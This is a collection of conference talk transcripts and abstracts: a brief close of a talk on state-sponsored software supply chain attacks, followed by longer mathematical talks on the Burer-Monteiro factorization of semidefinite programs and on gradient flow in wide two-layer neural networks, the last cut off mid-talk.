whom I've referenced a few times in here. So if you can gain a position of trust, you can exploit it. Think service or non-person IDs. Accounts that nobody really scrutinizes with enough privilege to leverage, e-discovery, and to find all the stuff that you need for an attack. Your chain is only as good as its weakest link. And there are more ways to abuse the chain of trust than people realize. Thank you so very much. I hope that you got some good stuff to work with out of this talk, and I really appreciate your time. My details are there. You can find me on Twitter. Thank you.
|
State-sponsored threat actors have engaged in software supply chain attacks for longer than most people realize, as governments seek out access to information and potential control. Of Russia, North Korea and Iran, China has been behind the most attacks, targeting the technology sector for economic espionage and intellectual property theft. In their current drive for innovation and cloud migration, organizations increasingly rely on software development and all its dependencies: third-party code, open - libraries andshared repositories. Recent attacks have shown how easy it is to create confusion and send malicious code undetected through automated channels to waiting recipients. This talk will walk attendees through the stages of past attacks by Chinese APTs - notably APT10, APT17 and APT41- to show how capabilities have evolved and what lessons could be applied to recent attacks, comparing tactics, techniques and procedures.
|
10.5446/54180 (DOI)
|
Thank you very much and thanks to all the organizers for the invitation to this conference. So what I'm going to present is a joint work with Adrien Rogers from the Berle Institute in Groningen. It's a work that we did a bit more than a year ago. So it's about semi-definite programs. So let's consider a general semi-definite program. So we have an unknown matrix X. So we want to find this unknown matrix X. We wanted to minimize the trace of CX for some fixed and known cost matrix C under two types of constraints. So X must satisfy a fine constraints. M a fine constraints represented by the equality A of X equals B, where A is a linear operator with range included in RM. And also we want X to be a semi-definite positive. So these semi-definite programs, they arise in particular as a relaxation from combinatorial optimization problems. It has been known for quite a while now that there are many difficult optimization problems which you can lift. So approximate in some sense by semi-definite programs. And oftentimes, although the semi-definite program is apparently only an approximation of the initial problem, it turns out that when you solve the semi-definite program, you get the exact solution of the difficult problem that you've started from. And in particular, this lifting procedure appears when you want to solve max cut problems. So I mentioned it here because it's a family of semi-definite programs which we use as an example, as an illustration at the end of the talk. So I prefer to introduce it now. So max cut problems are originally problems from graph theory. You take a graph and you want to partition its vertices into two sets so that the number of edges that you cut when you do the partition is maximal. And it turns out that you can approximate maximum cut problems by semi-definite programs of the form written here. So of the form minimize the trace of Cx for some cos-metric C under the constraint that the diagonal of x contains only the number one. And also under the constraint, of course, that x is semi-definite positive. There has been a lot of research into algorithms which can solve semi-definite problems. So there are several semi-definite problem solvers which work in polynomial time. So if you fix a precision, you can solve your semi-definite program in polynomial time depending on the precision. However, these problems, these solvers, although polynomials tend to be slow because the order of the involved polynomial function is large. So for instance, if you use interior point solvers, then in full generality, the periteration complexity is of the order of n4, where n is the size of the unknown matrix. So of course, you imagine that you cannot work with very large values of n. Of course, other algorithms that then interior point solvers are possible, but they tend to serve up further from more or less the same drawback. So if you still want to solve high dimensional semi-definite programs, you have to exploit the fact that the problems that you consider are not generic. They may have favorable properties that you can use. In particular, oftentimes the semi-definite programs that we are interested in, they have a solution with low rank. So actually for geometric reasons, semi-definite programs always have a solution with rank at most this number. So it's of the order of square root of 2m. I recall you that m is a number of affine constraints. But in many situations, because of the way that the semi-definite program has been constructed, in particular through lifting from a combinatorial optimization problem, there is often a solution with rank 102. So very smooth. And to exploit the fact that there is a solution with low rank, there are two main families of methods. One of them is Frank Wolf methods. And the other one is the Burma Montero heuristic. Both of them are interesting. But in this talk, I will focus only on the Burma Montero factorization. So let me explain how it works. So since there is a, we assume that there is a solution with low rank. So we call R opt the rank of a low rank solution. And we observe that the solution then can be written as x equals v, v transpose for matrix v with n rows and p columns for any integer p, which is at least as large as the optimal rank. And so it means that we can write the unknown matrix x under the form v, v transpose. And instead of directly trying to recover x, so to optimize over x, we can try to optimize over v. This change of variables transforms our generic, our general semi-definite problem at the top of the page into the second problem where we want now to minimize the trace of c, v transpose over all matrices v, which satisfies the condition a of v, v transpose equals b. You note that the semi-definite positiveness constraint has disappeared because matrices of the form v, v transpose are always semi-definite positive. I'd like to emphasize the fact that p, the integer p is a factorization rank. So it's called the factorization rank. And it's a parameter of the factorization. It's something that must be chosen. It can be equal to r-opt. It can be larger. And whether you choose it equal or larger or much larger, will be important for the properties of the factorized problem that you get. So one choice or another may make this problem easier or more difficult to solve. So it's an important choice. So now let's consider the factorized problem. And let's assume that the set of feasible matrices v, so the set of matrices v satisfying the constraint a of v, v transpose equals b, is a manifold. And it's a nice manifold in the sense that we know it explicitly. We can manipulate it. And in particular, we can run Riemannian optimization algorithms over this manifold. So in this setting, well, we can precisely try to minimize the trace of c, v, v transpose by Riemannian optimization over the manifold of feasible points. And then the number of variables that we have to optimize during this process, it's not n squared anymore. As in the non-factorized formulation, it's n times p, the number of coefficients in v. And since p can be much smaller than n, we have much less coefficients to find. So we can hope for Riemannian algorithms to be much faster than SAP solvers. However, there is one issue. It's that the factorized problem, it's not convex anymore. On the contrary to the semi-definite program, which we had at the beginning. In particular, it might happen that Riemannian optimization algorithms get stuck at a local minimum or critical point instead of finding the global minimizer of the problem. It's an issue that which can arise or cannot arise and it depends on the choice of the factorization rank p. Therefore, I want to study the question, how must we choose p so that it's possible to solve the factorized problem without getting stuck at critical points? To give a partial answer to this question, I will first start with a literature review. We'll see that empirical observations tend to suggest that as soon as p is of the order slightly larger than the optimal rank, then Riemannian optimization algorithms work. They do not get stuck at critical points. And this phenomenon has been theoretically explained in very specific situations, but not in a general setting. In a general setting, so with no strong assumptions on the cost metric c, the only guarantee that we have require the factorization rank p to be the b of the order of square root of 2m, where m again is a number of constraints. And since the optimal rank is generally much smaller than square root of 2m, there is a big gap between practice and general theory. So then we'll try to determine whether this gap is theoretical artifact or not. And we'll see that it's possible to very slightly improve the general guarantees in the literature. But this improvement is very minor. It doesn't change the leading order square root of 2m. And with this improvement, the general guarantees are optimal in the sense that if p is smaller than square root of 2m, then the guarantees do not hold. Without additional assumptions on the cost metric c, it's not possible to guarantee that Riemannian optimization algorithms will work and not get stuck at critical points. So this will be the main results of the talk. And I try to give a brief overview of the proof. And finally, I will try to describe two open questions. So let's start with the literature. So the Bureau of Montero heuristics has been introduced by Bureau and Montero in 2003. And in the article where they introduced the heuristic, Bureau and Montero performed a lot of numerical experiments on various semi-definite programs. They used only a factorization rank p of the order of square root of 2m. They did not try smaller values of p. But at least for p equals square root of 2m, they observed that Riemannian optimization algorithms worked all the time. Other experiments can be found in an article by Journey back from 2010, which contains numerical experiments notably on max cut relaxations. So these experiments are conducted with a specific initialization scheme. But at least with this scheme, the authors observed that Riemannian optimization algorithms always worked when p was exactly equal to the optimal rank. So in principle, very small. And yet another set of experiments has been done by Nicolas Boumal with problems coming from arising as relaxations of so-called orthogonal synchronization problems. And in this set of problems, the optimal rank is exactly 3 by construction. And Nicolas Boumal observed that Riemannian optimization algorithms always worked as soon as the factorization rank p was larger than 5. So strictly larger than the optimal rank, but not much larger. And similar observations have been made for variants of SDP problems, which I will not describe. So this phenomenon has been theoretically rigorously explained in a very specific setting by Banderaboumal and Voroninsky in 2016. So the authors, they considered semi-definite problems arising as obtained by lifting optimization problems called Z2 synchronization or community detection. They made very strong assumptions on the statistical properties of the underlying Z2 synchronization and community detection problems. Thanks to these strong assumptions, the resulting semi-definite programs had a lot of structure. And this allowed them to show that with high probability, the semi-definite problems they considered had rank 1. And the Bureau of Montero factorization with factorization rank p equal 2 was such that Riemannian optimization algorithms could not fail. So in this specific case, the success of Riemannian optimization algorithms was explained, but it's quite a complicated proof and it's only for a very specific setting. For variants of semi-definite programs, other very specific settings could be studied and similar results could be obtained. But all the time, the principle is the same. You need very strong assumptions on the problem that you consider. And then with these strong assumptions, you can show that if the factorization rank p is larger than the optimal rank, then everything works. And if you don't want to have to do very strong assumptions on the semi-definite program that you consider, then the literature does not contain many results about this. There is essentially one result. It's again due to Bumal, Voroninsky and Bandera. So I will describe these results. Let me first recall the problem that we are considering. So it's a factorized semi-definite program. We want to minimize the trace of CV V transpose over the matrices V for which A of V V transpose is equal to B. So we denote by mp the set of feasible matrices V. And we assume that this set is a manifold. Actually, Bumal, Voroninsky and Bandera need a slightly stronger assumption, but in practice it's essentially equivalent to the fact that this set is a manifold. So the problem that we consider can be equivalently rewritten as minimize the trace of CV V transpose over all matrices V in mp. And Bumal, Voroninsky and Bandera observe that Riemannian optimization algorithms, at least suitable Riemannian optimization algorithms, when properly implemented, they necessarily converge to a second order critical point. Meaning that they converge to a point, to a matrix V zero in mp, which satisfies first order conditions. So the gradient at V zero of the cost function is zero. And which also satisfies second order conditions, meaning that the Hessian of the cost function at V zero is semi-definite positive. And the authors showed that for almost all cost matrices C provided that the factorization rank P was larger than a square root of 2m plus 1 fourth minus 1 half, then all second order critical points were global minimizers. As a consequence, since Riemannian optimization algorithms find at least one second order critical point, well, they necessarily find a global minimizer. So this proves that Riemannian optimization algorithms necessarily succeed in finding the global solution, provided that P is larger than this number, which is essentially square root of 2m. You observe that the lower bound on P in the theorem does not depend on the optimal rank. It's of the order of square root of 2m, whether the optimal rank is large or very small. So to summarize what I've said so far, from numerical experiments, it seems that Riemannian optimization algorithms work well as soon as the factorization rank P is of the order of the optimal rank. But the only theoretical general guarantees that we have to justify this fact require the factorization rank P to be at least as large as square root of 2m. Yes. Can you explain what do you mean by almost all C in the previous term? Yes, sorry, I haven't said it. Almost all C means all matrices C minus a set with zero Lebesgue measure. So it's in the Lebesgue measure sense. And as I've already said several times, the optimal rank is generally much smaller than square root of 2m, and hence there is a gap between these two regimes. So now we are going to try to answer the question, is it possible to obtain general guarantees for values of P much smaller than square root of 2m? And we are going to see that we can slightly improve the lower bound on P in the theorem by Bumal, Voroninsky and Bandera. But it's really a slight improvement. It will not change the fact that this bound is of the order of square root of 2m up to constants. And with this improvement, the result is essentially optimal in the sense that even if you assume that the optimal rank is one, so the smallest you can hope for, then even in this situation, if P is smaller than square root of 2m, there are situations, there are bad cos matrices in C for which it's possible that we may not optimize algorithms. So first, the slight improvement over the result by Bumal, Voroninsky and Bandera. So we can have the same theorem as theirs, replacing their lower bound by square root of 2m plus 9 force minus 3 halves. So you can check that this lower bound is strictly better than the one in Bumal, Voroninsky and Bandera. But generally, the two upper bounds, the lower bounds, they differ only by one unit, meaning that unless m is very small, it's not very interesting. And with this improvement, the theorem is essentially optimal. So let's describe y. So we define r0 to be the minimal rank of a matrix x in the feasible set of the original semi-definite program. So this is a line at the top. And then on the suitable hypothesis, so technical hypothesis which I will not describe but which are generically satisfied, as soon as the factorization p, the factorization rank p is smaller than this number, which is of the order of square root of 2m, there exists a set of bad cos matrices C for which the corresponding semi-definite program has an optimal solution with rank r0. And nevertheless, the Bure-Montereau factorization has a second order critical point which is not a global minimizer, meaning that if you try to run a Riemannian optimization algorithm and you're unlucky enough to initialize it close to the second order critical point which is not a global minimizer, then this algorithm will fail. So in this theorem I have a number r0. In most applications of interest, r0 is really small. You can even, so in many applications, actually r0 is 1. So this yields the following picture. When the factorization rank p is larger than square root of 2m plus 9 fourth minus 3 halfs, then Riemannian optimization algorithms work for almost all matrices C. When the factorization rank p is smaller than this number, then you cannot rule out the possibility that Riemannian optimization algorithms fail. And in between, we don't know what happens, but the in between has only size r0 minus 1. So it's typically much smaller than square root of 2m. And if r0 is equal to 1, it's even 0. We can apply this result to max cut problems as I've described in the introduction. So I recall that max cut relaxations are semi-definite problems of the format at the top. So you want to minimize the trace of Cx under the constraint that the diagonal of x is 1 and x is semi-definite positive. When we relax it, so when we factorize it through the Bure Montero heuristic, we get the problem minimize the trace of Cvv transpose under the constraint that the diagonal of Vv transpose is 1. And in this case, we can check that r0 equals 1 and the technical hypotheses that I've mentioned are satisfied. Therefore, for problems of this type, if the factorization rank p is larger than the number at the top, then Riemannian optimization algorithms always work for almost all cost matrices C. But if p is smaller than this quantity, then there are matrices C in a non-zero, the big measure set for which even if we assume that there is a rank one solution, so much smaller than square root of 2m, there are bad second order critical points and Riemannian algorithms can fail. So I'm now turning to the proof. Do you have questions before I begin the proof? Yes? Sorry, yeah. So in my theorem, I consider a family of semi-definite problems. I consider I fix A, I consider the operator A which defines the affine constraints is fixed, but I consider all possible cost matrices C. So there is not one global solution. So r0 is the minimal possible rank for the solution when I look at all possible cost matrices C. So if you consider the set of C of matrices C for which the rank is equal to one, the rank of the best and the final value is t, will this send me a zero-nearby measure or a negative value? No, it's not. No, it's not. Actually, it's also a consequence of the theorem, although it's not formulated that way. If you forget the second property, then you see that there is a non-zero-big-measure set on which the global minimizer necessarily has rank r0. Okay, so let's start with the proof. So we assume that the factorization rank p is smaller than the square root of 2m plus this. And we want to show that Riemannian optimization algorithms can fail. So we want to show that it's possible to construct a set of cost matrices C with non-zero-big-measure on which the global minimizer has rank r0. And for any cost matrix C in this set, there is, so the factorized problem has a second or the critical point, which is not a global solution. This is done in two steps. First, we construct one matrix C which satisfies these two properties. And second, we show that all cost matrices close enough to this bad C satisfy the same properties. Hence, there is a small ball of cost matrices C satisfying these properties. Hence, there is a non-zero-big-measure set of matrices satisfying these properties. The second step is very classical. So it uses only classical arguments. I will therefore focus only on the first step. So I will try to explain how it's possible to construct one bad cost matrix C. So let's fix x0 with rank r0 in the feasible set of the semi-definite problem. And let's fix v in the feasible set of the factorized problem. And we are going to construct a cost matrix C for which the semi-definite problem has x0 as a global minimizer. And the factorized problem has v as a second or the critical point, which is not the global solution. So if we construct such a C, then we have constructed a C satisfying the two properties that we want. The global minimizer has rank r0. And there is a second or the critical point of the factorized problem, which is not optimal. So it turns out that constructing such a matrix C is actually possible for almost any choices of x0 and v. So let's fix arbitrary x0 and v and construct C. So we want C to have x0 as the unique global minimizer of the semi-definite problem. And we want the factorized problem associated with C to have v as a second or the critical point. Since we know the analytic expressions of the gradient and the Hessian of all the functions involved, we can rewrite these two conditions on their explicit analytic forms. And we can simplify the expressions that we get. And we can show, trust me about this, it's not obvious, but we can show that the construction of C is possible as soon as there exists a vector mu in Rm for which v transpose A star mu v is semi-definite positive. And x0 transpose A star mu v is 0, where A star is the adjoint operator of A. So we wonder whether there exists such a mu. And to determine whether it exists or not, we consider the map, the following map, so from Rm to the product of the symmetric matrices with size m, p by p, and the matrices with size r0 by p. The map which to mu associates v transpose A star mu v, x0 transpose A star mu v. And we compute the dimension of Rm and the image set, so the symmetric matrices times r0 by p matrices. And we observe that if the dimension of Rm is larger than the dimension of the image set, so p, p plus 1 over 2 plus p times r0, then the map that I've just defined should generically be subjective. You consider more or less arbitrary map between a vector space and vector space with smaller dimension. It's generically subjective. And if the map is subjective, it's possible to find mu such that the two conditions above are satisfied. You can do this by choosing mu for which the image of mu by the map is the identity product with 0. And the condition that m is larger than p, p plus 1 over 2 plus p r0 is exactly equivalent to the condition that we have imposed on p at the beginning of the proof. Hence, the map which I've defined is generically subjective and mu generically exists. And because we have technical assumptions which I've hidden under the carpet, actually it's not generically subjective, it's subjective. So let's summarize. When p is larger than the square root of 2m, Bumal, Voroninsky, and Bandera have shown that for almost any cosmetics, the factorized problem has no second order critical points which are not minimized. And hence, the factorized problem can be solved efficiently. And numerical experiments suggested that maybe we could conjecture that this was also true for p of the order of the optimal rank, so smaller than the square root of 2m. And what we've proved with Allen Rogers is that when p is smaller than the square root of 2m, no, actually it's not true. If we want to guarantee that Riemannian optimization algorithms work, we need to use some additional assumptions on it. It's not true for any. There are two open questions which I would like to briefly describe. So the two main open questions which I'm interested in are first, to better understand the regime where p is smaller than the square root of 2m. And second, to see how the Burma-Monterra technique applies to phase retrieval problems, so a specific family of semi-definite problems. So for the first question, actually the theoretical guarantees which now exist in the literature about solving the Burma-Monterra factorization, these results, they are of two types. So either you have articles which assume very strong assumptions on the cost matrix, so on the problem, and they get very strong conclusions. You can show that there are no bad critical points for p of the order of the optimal rank, so the optimal rank or the optimal rank plus 1. So when the cost matrix c is very nice in some sense, you can say that the factorization works for p of the order of the optimal rank. And what we've shown with add-on waters could be summarized by the sentence, but if we allow c to be arbitrarily adversarial, then it's necessary to take p of the order of square root of 2m. Otherwise, we may get stuck into critical points. But in most applications, I think the cost matrix is c, they are neither very nice, neither very bad. So we'd like to understand the regime in between. So it would be interesting to get results like if we have like reasonable but not very strong assumptions on c, then the Burma-Monterra factorization has no second order critical points for p of the order of the optimal rank, so not exactly the optimal rank, but something like maybe twice or three times the optimal rank. So this is something that I think would be useful. And the second question which I'm interested in is to see what theoretical insights which I've tried to describe can apply and be potentially useful in a specific application. So I'm personally interested in phase retrieval problems, which are problems arising notably in optics, where you try to reconstruct a vector x with complex coordinates from the modulus, the standard complex modulus of linear measurements. These problems, it's known that they can be approximated with semi-definite problems. And when we solve the corresponding semi-definite problems, we get phase retrieval algorithms, which are usually very precise, but which do not really work in high dimension because solving semi-definite programs is usually costly. And so I would be interested in understanding to what extent the Bureau of Montero-Harris-Tic can speed up the solving of phase semi-definite problems coming from phase retrieval. It's something that has been tried before, but I think there are questions which have not been looked at with maybe enough care, in particular understanding which factorization rank we must choose. I think in the case of phase retrieval, it's both a subtle and important question. And so I think this question is interesting. And with that, I'm going to thank you for your attention.
|
The Burer-Monteiro factorization is a classical heuristic used to speed up the solving of large scale semidefinite programs when the solution is expected to be low rank: One writes the solution as the product of thinner matrices, and optimizes over the (low-dimensional) factors instead of over the full matrix. Even though the factorized problem is non-convex, one observes that standard first-order algorithms can often solve it to global optimality. This has been rigorously proved by Boumal, Voroninski and Bandeira, but only under the assumption that the factorization rank is large enough, larger than what numerical experiments suggest. We will describe this result, and investigate its optimality. More specifically, we will show that, up to a minor improvement, it is optimal: without additional hypotheses on the semidefinite problem at hand, first-order algorithms can fail if the factorization rank is smaller than predicted by current theory.
|
10.5446/54181 (DOI)
|
Thank you. And I would like to first thank the organizers for the event, very nice and sunny, and for inviting me. So today we need to speak about a lot of benchmarking, as you will see. And this is joint work with Enig Shiza. And when I say joint, this is more like me running after Enig. And so the topic of today is to look at gradient descent for, so, wide two-layer neural networks. So here I drew a very wide network. Okay, so we have the input, it will be X in RD. Okay, here we have M hidden neurons and a single output, which I recall Y. And so I'm going to restrict myself to a particular activation function. And I'm going to consider predation functions of the form f of X is one of M sum of I equals M from one to M of AI, Bi transpose X plus. So I'm considering the so-called relu activation function. So plus is just a positive part, the max of the argument and zero. So why is it interesting? So this is really a small proxy for deep learning. Okay, so it's a huge simplification, a single hidden layer. Okay, it's not really deep. No convolution, no pulling, no weird things. So good old, like fully connected neural network. And I'm going to focus a lot on this activation function. So why is it hard for us? Okay, so this is, the function is linear in A. So this would be the easy part, but it is non-linear in B. And this will create problems for optimization. And the other hard part will be that those are wide networks. So M, the number of hidden neurons will tend to infinity. Okay, so this is open code, the other parameterized regime. So here we're not trying to compare the number of observations or the number of parameters. We take M to infinity. And as we see, a big caveat in our analysis is the lack of quantitative analysis. So M is very big, and I will not tell you how big it needs to be. All right, so this is the setup. So why are we considering this? We're going to leverage two properties. One is what I call separability. So essentially your prediction function, F, is a sum of terms, okay, and the parameters for each of the terms are unique to those terms. It's a separable parameterization. And often I will use the notation F is 1 over M sum from i equals 1 to M of some phi of wi. Okay, just to highlight the fact that the sum of functions, okay, and so here, F is a function. So phi of wi is a function. So for example, so here, this corresponds to phi of wi at x is a of bx plus. Okay, so wi is the two-pole AB. And it's just to highlight that, okay, we have a separable function. Okay, and for the first part of the talk, I'm going to focus mostly on that setup. Okay, so just using separability. And if you look carefully, this works well for the one hidden layer. But if I add more layers, this will not be true anymore. Okay, the sharing of parameters, it's not true that beyond a single hidden layer, you're going to have some separability. So from the start, all the things I'm going to say cannot apply directly to more than one hidden layer. This is the first big assumption. And the second would be, so 2 homogeneity. Homogeneity. So what I mean by that is phi of lambda w is lambda square phi of w. Okay, so this is true for the ROLU. And this is why we consider the ROLU in this work. It's because the ROLU is homogeneous in A, homogeneous in B. And if you take the pair AB, it's two homogenous. Okay, so this is why we consider the ROLU. Before I move on, if you want to interact with me, please do so. Okay, you can get back at me. You have 35 minutes to do so. Okay. All right, so this is a setup. So we're going to consider a classical learning setup where we have some data. So it's xi, yi, nothing particular from i equals 1 to n and coming from qx, y. Okay, we have a loss. So this is not really particular. So you have a loss, L of y, f of x. And here we're going to assume the loss is convex with respect to the second variable. Okay, so it's convex with respect to the second one. And this can be logistic, this can be square loss. And I consider this as being a weak assumption even in the deepest of the deepest networks. They use what they call the cross-entropy loss, which happens to be convex. Okay, so I'm going to assume convexity in f. And I'm going to minimize the risk. Okay, so it will be the risk of f, the function f, will be an expectation of the loss, y, f of x. Okay, so here, depending on the setup, this will be the expectation with respect to the empirical distribution. And the average of the data, xi, yi, from i equals 1 to n, n, or this can be the expected loss. Okay, at the end, this is simply the risk. So it's convex in f because I assume L is convex. Okay, so this is a very, very standard setup. All right, so now I'm going to look at some properties. And I think the key here is that one big message of the talk, and this is true for several other talks, is that we cannot simply... So here, I've not talked about estimation algorithms. I just have some model, okay, I have a model which is at the top. I have some criteria which is there. And typically, it's enough, okay. Statisticians will tell you how to analyze this. And optimizers will tell you how to optimize it. Okay, so here, the key message that you cannot do this separately, very similarly to HGD. Okay, here you have to analyze some algorithm which is key to the analysis. And this will be, as the title says, gradient descent. Okay, so I'm going to study gradient descent techniques when I want to minimize the risk. And I have the parameters of F which are of that form. Okay, so in F, it's convex, but in W, it's not convex. Okay, why? Because Phi is not a linear function. All right, so this is a standard setup. Okay, so I'm going to do two things. Okay, so two parts from my talk. One is global convergence. The other is the idea that although we are non-convex, okay, in W, then if you let M go to infinity, and of course, there will be a lot of technical assumptions, we need to sweep under the carpet, okay. Then you do get some global convergence. This will be the first part of the talk. And then second, I will talk about what people call the implicit bias. The idea being that since I'm going to optimize with M big infinite, my space of function is huge. So typically, in particular when I minimize the un-picker risk, I have lots of minimizers. And among those minimizers, my algorithm will select one. And I want to study the one which is selected. Okay, and I will show like three different implicit biases, okay, and three different behaviors. And if you are nice, I will show you videos at the end. And so this is joint work with Lenaik and myself from 2018. And this is a mixture of something from this year and something with Edward Royalon, CBO, from last year. Okay, so if you want to know more, the papers are online. All right, so let's look first at the first element. And now I can use a reason why I give a talk on the blackboard is to play with the boards, okay. All right, so global convergence now. Okay, so the idea is to minimize, we're going to consider g of w. So it's a big w. So you have M weight vectors wm. Okay, if you go by the top board, okay, those are my weights. And this is simply the risk of 1 over M sum from i equals m of w. All right, so this is what I want to minimize. And the main gist of having M go to infinity is to write this as you're going to replace this empirical average by the integral of our measure, okay, and then you're going to optimize over measures. The weight is being done. And that you write it as you consider f of mu with the risk of the integral of phi of w d mu of w. And we're going to assume that mu here is a probability measure. Okay, so this is the way we're going to formalize it. So we have some probability measure. And if you take mu being the sum of the racks, you have that f of mu is g of w. Okay, so this is the main two we're going to consider. And these two are not ours, okay? So there's a long list of people looking at this. And I think this starts back with, I think, Baron, which you're Baron. Baron 83. So there is Andrew Baron in 83. There is Benjo, Le Roux, et al. 2005. And I've worked on it quite a bit while two years ago. Okay, so this is a very classical idea. And why is it so nice is that I've made my problem convex. Why? Because as a function of mu, so the space of probability measure is a convex set, okay? This is a linear function in mu. R is convex, so I have a convex problem. Okay, so this is, I've made my problem convex, but the downside is the fact that another space of probability measures on Rd is infinite dimensional, and it's going to be hard to optimize. Okay, so because it's convex, so what I tried first and failed miserably is to use convex techniques. Okay, so there's not too many talks about Frank Wolf, because it's not about one talk by Frank Wolf by Yifan. Then I have a big convex set, which is a convex set of many things, so I can optimize using Frank Wolf. And in Frank Wolf, you build your estimator incrementally, okay, as a weighted sum of elements, and every time you have to add a new element, okay? It's often called a Frank Wolf step. The problem, okay, the good thing is that if you can do the Frank Wolf step, you get a nice convergence rate as 1 over k when k is the number of iterations. But the downside is that to select a new neuron, you have to solve some problem called the Frank Wolf step, and this problem happens to be NP-hard. Okay, so you're replacing this hard problem, okay, which is not convex. You try to replace it by a convex problem, but every iteration requires to solve NP-hard problem, so it's not really useful, and if you want to know more about all the missed trials, there is like a few pages on that in this paper. And second, it's not that people are doing practice. It's tracked, but if you whiten the data. It is tracked, but if you whiten the data, what do you mean? There's a paper by Mark. No, yeah, I read the paper, and... We just got caught up. I read the paper, and tracked, but I think there's some powers involved. No, I think it's a mental issue. Okay, but... I had this from my reading of the paper in the airware. It doesn't mean like... It was not solving, but it's not the topic of today. The NP-hard problem is computing a brain, so... As an NPI, you want to do the Frank Wolf step. You have a gradient, you want to find a neuron which maximizes the problem with a gradient. It's linear classification, which is NPR. So if you assume some reduced... Anyway, it's not the topic of the talk, but... And... Yeah, so anyway, it's not people doing practice. In practice, people do just gradient descent. Okay, on this, okay, so this is gradient descent on the weights AB. So it's backprop, and we're going to study this. All right, so let's study backprop. So we're going to not use gradient descent. We're going to make our life simpler by using the gradient flow. What is the gradient flow? So if you do gradient descent, so... If you do hiking, so this is lumini, this is a canok, okay? So if you do gradient step, you do some things like that. So this is gradient descent. And gradient flow is like the limit with infinitely small step size, so it's more something like this. And this corresponds to the ODE, W dot, is minus M gradient of G of W. So the M is to make things easy when I'm going to take the limit when M goes to infinity. So this is what I'm going to minimize. So here, clearly, we go away from what people are doing practice, but it's the only thing we can do at the moment. And now I can hand wave my way through justifying why it's not too bad. So first, as I've mentioned, this is when your step size gets small, you get close to the gradient flow. And this is true both for the deterministic gradient and also for stochastic gradient. Okay, if you do HDD with a single pass, so you can see that the approximation of the gradient flow. So we need to study this one. Okay, so now the goal is to show global convergence of the gradient flow. What I mean by that is, I have option F, D final measures, and the goal is if I load the gradient flow on that function and M is big enough, I want to get to the minimizer of F. Okay, so this is what we are going to show. We're going to need two assumptions. So I don't want to talk about the technical ones, but the ones which are important. So the first one is, so two, homogeneity. Okay, so this is not necessary, but sufficient. And you can think of removing these constraints, and you get to, you can optimize anything. Okay, so this is unlikely to be true. And you're going to be going to need as well. So random initialization. Okay, so here I'm going to require that I sample all directions. I have put positive mass on all directions. Yep. I just, how do you define phi of W? Phi of W, this is W. So this is at the top. Okay, this is for neural networks, it's a function, and W is AB. And so we need to assume that you cover all the sphere of directions. Okay, so the problem is too homogeneous. So what you care about is directions. You need to sample weights. Uniform is simpler, it's simple, but you need positive mass everywhere. So one simple way is that W gargantuan, okay, that would be easy. And this corresponds to what people do in practice. Okay, they take A and B gargantuan, okay. So we're going to assume this, and then what we have, we have a theorem, and I put quotes because I'm missing a lot of the technical assumptions. Okay, then what we have is that when M goes to infinity, okay, so the trajectory, so the flow, goes to what is called a Vassarstein gradient flow. Okay, so the first part of the statement, so I will not define what the Vassarstein gradient flow is, it's just to highlight the fact that when you get M go to infinity, this does correspond to something which is well defined mathematically, and which you can analyze. Okay, so this is really just to make sure that what you cover is a PDE, and if you want to know more, you can look at the paper, or we can talk after the break. So this first thing, it does have a meaning, it has T, and if it has a limit, mu infinity, then mu infinity is an armin of F. Okay, so this is just a statement which I more or less expressed that as we get more and more particles, we often call the W's particles, you end up converging to the correct measure, so in a weak sense, okay, it has to be a weak sense because we have a bunch of Dirac's, and we may get to a density at the end. And so this has like a lot of limitations, so let me write them down immediately. So first, some other papers that do similar things, so there is Nintendo and Suzuki, who are already showing the first aspect, and there is a Me and Montanari, Monta, you know Montanari, okay, who are doing also similar things, okay, so it's a bit different, but so Nintendo, they prove, they prove convergence to a vassal gradient flow, and Me and Montanari, they prove convergence if you add some noise, okay, so it's a bit different, but it's interesting. Yeah? The two homogenities for phi or for G? For phi, so phi. For the four phi. For phi, yeah. So here, so if you take my setup over there, the loss is any convex loss, it is just for phi. So this applies to, but there are other situations, so this applies to spike decommolution, this applies to matrices, so this is like more general than neural networks. So there are big caveats, that this is this, if it has a limit, okay, so we've tried for several months to show that, to give summation conditions for the gradient flow to have a limit, and in the Euclidean case, this is known to be possible with like the Euclidean conditions, but for Wasserstein, we are not able to do it, so we simply assume that it does have a limit, okay, this is the first issue, and second issue is that this is very qualitative statement. It's just when m goes to infinity, and when t goes to infinity, okay, I will not tell you how big m needs to be, so how many neurons do I need, I don't know, and how big, and how fast am I converging, I don't know either, okay, so as you will see, this talk is full of open problems, and this is one of them, okay. So any questions on that part? Yep. Very good question, okay, and so this, so here, this is a conduct function, so with respect to mu, in a sense, in the classical sense, there are no local minima, but in the Wasserstein sense, there are local minima, there are stationary points, okay, and this is well known, if you take mu being a set of direct measures, if you optimize the neural network, it gets stuck, okay, so it is known that there are local minima, okay, and there are recent formal pros by O.H. Shemmier and colleagues, so there are local minima, and what makes it work is a similar argument and the paramethod for eigenvectors, so this includes the paramethod, not obvious, but this includes the paramethod, and so you get, so the idea that, so the proof, so I'm not going to do the proof, it's going to take me like the full day, is the fact that what we show is that if you convert to a stationary point, since we assume M is infinity and we have a density when we start, because we have this random initialization, then you can show that you cannot convert to a non-local, you still have mass everywhere that will forbid you to escape stationary points, like for the paramethod, if you look at a random sample, okay, it's always converging, okay, if you're really unlucky, you initialize away, like orthogonal to the leading eigenvector, and it's a similar thing, at every step, there is mass everywhere, so you cannot get stuck, so it's very informal, but it's quite happening. Is it something like negative curvature or? I don't know what negative curvature is, so it may. No, no, no, I know it's really, it's really the fact that, okay, in a sense, so I'm going to use the argument of Yann Leucan, okay, so if you add more and more neurons, okay, you can find a new passage, okay, to avoid like the local minima. Also, you're not going to show us a baby. Why a baby? That's the Yann Leucan argument. Oh, no, no baby, okay. I have videos, but no babies. Why is it, no, okay, so let me now move on to the second part, which is implicit bias, okay, because what this is saying, this is saying that, okay, so if you're overparameterized, now you can start to optimize, okay, now you can think of, okay, where does it converge to? Okay, I say to a minimizer of my, of my, of f of mu, f of mu is my risk, and if I have my unparameter risk, okay, I have eight data points, infinitely many parameters. Now, a lot of minimizers, okay, so where am I converging to? And this is the goal of the last, how much time do I have left? 20 minutes? What? 10 minutes. 10 minutes, okay, so I'll, a bit more, no, no, I said at 15. So I have 20 minutes. Why do you ask? Yeah, yeah, I don't know, I like to be polite, but, yes, okay, so here, we're going to follow, so we've tried with the square loss, a lot, also, so this is like three years with an A, it's three years of enjoyment, and sometimes pain of not trying to find good results, and we spent a lot of time trying to do this for square loss, okay, for the square loss, and you could imagine the gradient is linear function, it could be easier, and we couldn't do it, and then we saw the talk of, so very nice work by Sudri, Guna 